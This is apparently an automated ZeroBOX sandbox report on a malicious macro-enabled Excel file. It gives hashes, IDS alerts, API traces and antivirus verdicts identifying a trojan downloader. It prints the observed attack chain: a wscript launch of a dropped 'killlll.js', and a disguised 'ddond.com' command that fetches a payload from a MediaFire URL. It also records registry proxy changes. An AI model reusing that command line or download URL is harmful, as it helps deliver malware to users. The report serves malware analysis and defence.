Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 13, 2022, 1:31 p.m.	April 13, 2022, 1:34 p.m.

Size	15.8KB
Type	Microsoft Excel 2007+
MD5	`191cab791281ce1bb8729e77bdce2576`
SHA256	`80e3a3bb8825e6cf42ca77ffe16f029c8c5582d2edf557a33ebd62ab2bc3605c`
CRC32	`5691697F`
ssdeep	`192:ZtYhEqBaFUlbVvevUqzQXpS02LCtHOalOuvfW7lRYLrJCc6rEultIYWAb+V2K4a2:PYOzUlM9z6pSoOaMuel1/rGYWA+Vwa2`
Yara	Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\new.xlsm
1792
wscript.exe wscript C:\Users\Public\killlll.js
2316
ddond.com C:\ProgramData\ddond.com https://www.mediafire.com/file/p3ay4it08j1s7hp/0main.htm/file
1660

Name	Response	Post-Analysis Lookup
download2284.mediafire.com	A 199.91.155.25	199.91.155.25
www.mediafire.com	A 104.16.202.237 A 104.16.203.237	104.16.203.237

Flow	SID	Signature	Category
TCP 192.168.56.102:49166 -> 199.91.155.25:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49167 -> 199.91.155.25:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 199.91.155.25:443 -> 192.168.56.102:49168	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.102:49165 -> 104.16.202.237:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49165 104.16.202.237:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Organization Validation Secure Server CA	C=US, ST=Texas, O=MediaFire, OU=IT, CN=*.mediafire.com	49:b6:4e:74:94:f0:7e:32:2b:c5:39:18:d0:a5:1e:69:4d:65:8f:b6

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW April 13, 2022, 1:31 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW April 13, 2022, 1:31 p.m.	computer_name: TEST22-PC	1	1	0

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 13, 2022, 1:31 p.m.		1	1	0

request

GET https://www.mediafire.com/file/p3ay4it08j1s7hp/0main.htm/file

Time & API	Arguments	Status
NtProtectVirtualMemory April 13, 2022, 1:31 p.m.	process_identifier: 1792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0611c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2022, 1:31 p.m.	process_identifier: 1792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0611c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2022, 1:31 p.m.	process_identifier: 1792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6b773000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2022, 1:31 p.m.	process_identifier: 2316 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa7c7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 13, 2022, 1:31 p.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa7c7000 process_handle: 0xffffffffffffffff	1

file	C:\Users\test22\AppData\Local\Temp\~$new.xlsm

file	C:\Users\Public\killlll.js

Time & API	Arguments	Status	Return	Repeated
NtCreateFile April 13, 2022, 1:31 p.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x00000410 filepath: C:\Users\test22\AppData\Local\Temp\~$new.xlsm desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$new.xlsm create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1	0	0

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA April 13, 2022, 1:31 p.m.	key_handle: 0x000000000000029c regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA April 13, 2022, 1:31 p.m.	key_handle: 0x000000000000029c regkey_r: ProxyOverride reg_type: 1 (REG_SZ) value: 127.0.0.1:16107; regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride	1	0	0

Lionic	Trojan.Script.Generic.4!c
MicroWorld-eScan	Trojan.GenericKD.39468879
FireEye	Trojan.GenericKD.39468879
ALYac	Trojan.Downloader.XLS.Gen
Alibaba	Trojan:Win32/MalDoc.ali1000158
Symantec	CL.Downloader!gen87
ESET-NOD32	VBA/TrojanDropper.Agent.CNI
Avast	Other:Malware-gen [Trj]
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Trojan.GenericKD.39468879
Ad-Aware	Trojan.GenericKD.39468879
Emsisoft	Trojan.GenericKD.39468879 (B)
McAfee-GW-Edition	RDN/Powdow
GData	Trojan.GenericKD.39468879
Avira	VBS/Drop.Agent.jcaqi
MAX	malware (ai score=86)
Antiy-AVL	Trojan/Generic.ASMacro.30C16
Microsoft	TrojanDownloader:O97M/EncDoc.JRSM!MTB
Arcabit	Trojan.Generic.D25A3F4F
ViRobot	XLS.Z.Agent.16198
Cynet	Malicious (score: 99)
McAfee	RDN/Powdow
Zoner	Probably Heur.W97Obfuscated
Rising	Malware.Obfus/VBA@AI.82 (VBA)
Fortinet	VBA/Agent.XPW!tr
AVG	Other:Malware-gen [Trj]

Time & API	Arguments	Status	Return	Repeated
IWbemServices_ExecMethod April 13, 2022, 1:31 p.m.	inargs.CurrentDirectory: None inargs.CommandLine: wscript C:\Users\Public\killlll.js inargs.ProcessStartupInformation: None outargs.ProcessId: 2316 outargs.ReturnValue: 0 flags: 0 method: Create class: Win32_Process	1	0	0

new.xlsm